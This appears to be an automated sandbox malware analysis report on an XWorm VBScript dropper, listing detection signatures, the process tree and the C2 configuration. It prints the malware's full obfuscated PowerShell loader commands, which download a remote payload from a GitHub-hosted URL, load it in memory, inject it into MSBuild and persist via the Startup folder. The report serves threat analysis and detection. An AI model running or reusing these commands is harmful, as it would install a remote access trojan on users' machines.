Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
k4STQvJ6rV.vbs

Overview

General Information

Sample name:k4STQvJ6rV.vbs
renamed because original name is a hash value
Original sample name:e1cadf5476665ac4d120fea85cb6da31.vbs
Analysis ID:1527696
MD5:e1cadf5476665ac4d120fea85cb6da31
SHA1:e5675a315a6dae625d638dfddc3994c7eef317df
SHA256:a5fe6a6bb32827bf867aec2200c568e2015e233a6474292049c16400771fb6d9
Tags:vbsuser-abuse_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected XWorm
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7856 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\k4STQvJ6rV.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7944 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 8008 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • powershell.exe (PID: 8096 cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 7208 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MSBuild.exe (PID: 2396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
          • WerFault.exe (PID: 8000 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 1916 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • XClient.exe (PID: 2548 cmdline: "C:\Users\user\AppData\Local\XClient.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 5408 cmdline: "C:\Users\user\AppData\Local\XClient.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": ["futurist2.ddns.net"], "Port": "20506", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
SourceRuleDescriptionAuthorStrings
0000000C.00000002.2579124201.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    0000000C.00000002.2579124201.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x10749:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x107e6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x108fb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xfe0f:$cnc4: POST / HTTP/1.1
    00000009.00000002.1617406175.000001FFE6961000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000009.00000002.1617406175.000001FFE6961000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x18c19:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x2bac9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x18cb6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x2bb66:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x18dcb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x2bc7b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x182df:$cnc4: POST / HTTP/1.1
      • 0x2b18f:$cnc4: POST / HTTP/1.1
      Process Memory Space: powershell.exe PID: 7208INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x1e5c9:$b3: ::UTF8.GetString(
      • 0x4fb2c:$b3: ::UTF8.GetString(
      • 0x50102:$b3: ::UTF8.GetString(
      • 0x515be:$b3: ::UTF8.GetString(
      • 0x51cd1:$b3: ::UTF8.GetString(
      • 0x524f7:$b3: ::UTF8.GetString(
      • 0x5313c:$b3: ::UTF8.GetString(
      • 0x539cc:$b3: ::UTF8.GetString(
      • 0x542e2:$b3: ::UTF8.GetString(
      • 0x54b63:$b3: ::UTF8.GetString(
      • 0x5774f:$b3: ::UTF8.GetString(
      • 0x7276f:$b3: ::UTF8.GetString(
      • 0x792ba:$b3: ::UTF8.GetString(
      • 0x79897:$b3: ::UTF8.GetString(
      • 0x7a05a:$b3: ::UTF8.GetString(
      • 0x7a7fb:$b3: ::UTF8.GetString(
      • 0x90490:$b3: ::UTF8.GetString(
      • 0x90a66:$b3: ::UTF8.GetString(
      • 0xc5f1c:$b3: ::UTF8.GetString(
      • 0xc6673:$b3: ::UTF8.GetString(
      • 0xe8f19:$b3: ::UTF8.GetString(
      Click to see the 3 entries
      SourceRuleDescriptionAuthorStrings
      12.2.MSBuild.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
        12.2.MSBuild.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x10949:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x109e6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x10afb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x1000f:$cnc4: POST / HTTP/1.1
        9.2.powershell.exe.1ffe69692d0.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          9.2.powershell.exe.1ffe69692d0.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xeb49:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xebe6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xecfb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xe20f:$cnc4: POST / HTTP/1.1
          9.2.powershell.exe.1ffe69692d0.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
            Click to see the 2 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -
            Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ
